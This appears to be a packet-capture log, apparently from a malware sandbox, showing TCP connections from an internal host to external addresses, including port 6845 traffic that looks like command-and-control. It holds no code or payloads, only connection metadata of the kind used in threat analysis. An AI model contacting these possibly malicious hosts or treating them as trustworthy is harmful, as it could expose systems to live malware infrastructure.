                                                                                                                                                                                                Sep 30, 2024 16:24:36.679959059 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751935005 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751945972 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751962900 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753392935 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753403902 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753413916 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753432989 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753510952 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753521919 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753535032 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753556013 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753561020 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753572941 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753599882 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753985882 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764839888 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764852047 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764863014 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764893055 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764904976 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764918089 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764930010 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764940023 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764957905 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764970064 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764982939 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792000055 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792021036 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792033911 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792078972 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792090893 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792102098 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792114019 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792124987 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792144060 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792148113 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792165041 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792203903 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792203903 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792215109 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792226076 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792243958 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792316914 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792327881 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792337894 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792382002 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792438030 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792448997 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792459011 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792469025 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792471886 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792479038 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792491913 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792501926 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792521000 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792798996 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792809010 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792820930 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792840958 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792856932 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792856932 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792867899 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792886019 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792896032 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792907000 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792921066 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792946100 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792970896 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792982101 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.792987108 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793057919 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793612003 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793628931 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793641090 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793651104 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793659925 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793684006 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793736935 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793749094 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793760061 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793778896 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793780088 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793792009 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.793807983 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794245005 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794261932 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794272900 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794276953 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794284105 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794294119 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794303894 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794305086 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794310093 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794323921 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794328928 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794338942 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794342995 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794348955 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794352055 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794365883 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794377089 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794378996 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794387102 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794404984 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794517040 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794528961 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.794538975 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880494118 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880501032 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880506992 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880523920 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880527973 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880534887 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880546093 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880554914 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880578995 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880816936 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880834103 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880845070 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880856037 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.880875111 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881139040 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881150007 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881161928 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881186008 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881253958 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881264925 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881274939 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881285906 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881294012 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881303072 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881313086 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881314993 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881324053 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881335020 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881342888 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881345987 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881356955 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881357908 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.881396055 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.949080944 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:37.034363985 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:37.039218903 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:37.039271116 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:37.046312094 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:37.051198006 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:37.757038116 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:37.947810888 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:37.947875977 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:37.952366114 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:37.957319021 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:37.958658934 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:37.963505983 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:37.963573933 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:37.968523026 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:38.374758005 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:38.526093006 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:38.533509016 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:38.556910992 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:38.578177929 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:38.583527088 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:38.583606005 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:38.588933945 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:38.594142914 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:38.651599884 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:24:38.656426907 CEST8049176178.237.33.50192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:38.656491041 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:24:38.658246994 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:24:38.663084984 CEST8049176178.237.33.50192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:38.804016113 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.279786110 CEST8049176178.237.33.50192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.279885054 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:24:39.313488007 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.497117996 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.497208118 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.507581949 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.513714075 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.514257908 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.520672083 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.520746946 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.526989937 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.933645010 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938369989 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938395023 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938407898 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938419104 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938432932 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938462973 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938503981 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938550949 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938668013 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938680887 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938707113 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938791990 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938802958 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.938833952 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.939196110 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.939420938 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.939460039 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:39.943382025 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:39.980684996 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.208022118 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255023956 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255053997 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255064964 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255074978 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255090952 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255096912 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255101919 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255106926 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255105972 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255110979 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255145073 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.255145073 CEST491756845192.168.2.2245.90.89.98
Sep 30, 2024 16:24:40.255158901 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255171061 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255181074 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255192041 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255203009 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255204916 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.255214930 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255223036 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.255227089 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255244017 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255247116 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.255254984 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255266905 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255276918 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255280018 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.255289078 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.255296946 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.255320072 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.256438017 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.256449938 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.256460905 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.256474018 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.256489992 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.256508112 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.257813931 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.260265112 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.260291100 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.260301113 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.260329962 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.260360003 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.260405064 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.260550976 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.260615110 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.260627031 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.260652065 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.260673046 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.260684013 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.260709047 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.261455059 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.261467934 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.261483908 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.261493921 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.261506081 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.261518002 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.261533022 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.262298107 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.262319088 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.262331009 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.262353897 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.262372017 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.262383938 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.262407064 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.263185024 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.263196945 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.263214111 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.263219118 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.263226986 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.263231993 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.263240099 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.263262987 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.264087915 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.264106989 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.264117956 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.264131069 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.264132023 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.264144897 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.264151096 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.264185905 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.264983892 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.265002966 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.265016079 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.265028954 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.265041113 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.265045881 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.265060902 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.265834093 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.265851974 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.265865088 CEST  6845   49175  45.90.89.98    192.168.2.22
Sep 30, 2024 16:24:40.265873909 CEST  49175  6845   192.168.2.22   45.90.89.98
Sep 30, 2024 16:24:40.265875101 CEST  6845   49175  45.90.89.98    192.168.2.22
